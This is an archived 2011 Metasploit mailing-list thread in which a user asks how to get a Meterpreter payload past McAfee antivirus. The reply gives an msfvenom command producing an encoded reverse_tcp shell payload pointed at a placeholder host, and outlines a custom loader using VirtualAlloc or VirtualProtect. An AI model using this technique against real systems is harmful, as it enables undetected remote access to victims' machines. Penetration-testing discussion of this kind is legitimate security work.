Metasploit mailing list archives
Re: Yet another AV bypassing question
From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Fri, 24 Jun 2011 22:28:57 -0500
In short, no, it's probably not the DLL. The DLL is not embedded in an executable that Metasploit generates. Try generating a C version of the payload:

    ruby msfvenom -p windows/meterpreter/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=1.2.3.4

and create your own exe or modify the source of an existing one to run that code. You will need to make it executable before it can be executed as code; look up VirtualAlloc or VirtualProtect. There are plenty of other ways, but that's my favorite. See http://j.mp/mjyb8e if you want to see what goes into an MSF generated exe.

On Fri, Jun 24, 2011 at 6:55 PM, Average SecurityGuy <averagesecurityguy () gmail com> wrote:
> Have you looked at this
> http://dev.metasploit.com/redmine/projects/framework/wiki/Using_a_Custom_Executable_to_Bypass_AV ?
>
> On Fri, Jun 24, 2011 at 5:22 PM, Jason Hawks <jason.hawks0 () gmail com> wrote:
>> Hello list,
>>
>> Like many of you, I'm trying to bypass my AV, but I'm not lucky with the Metasploit encoders anymore.
>>
>> My question is simple (but I don't know the answer yet). Could modifying and recompiling the meterpreter source code (with spread dummy instructions and a lot of trial-and-error attempts) help me? Or is the main problem not in the meterpreter DLL but somewhere else?
>>
>> Actually, I tried modifying the source code of meterpreter (using Visual Studio Express), but it didn't change anything. Therefore, I'm wondering if it's just a matter of tries or if I'm wasting my time. Am I looking in the right direction?
>>
>> For information, I'm playing with McAfee 8.X right now.
>>
>> Thank you very much for your lights. Any other tips are welcome.
>>
>> Cheers,
>> Jason

--
scriptjunkie
http://www.scriptjunkie.us/
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework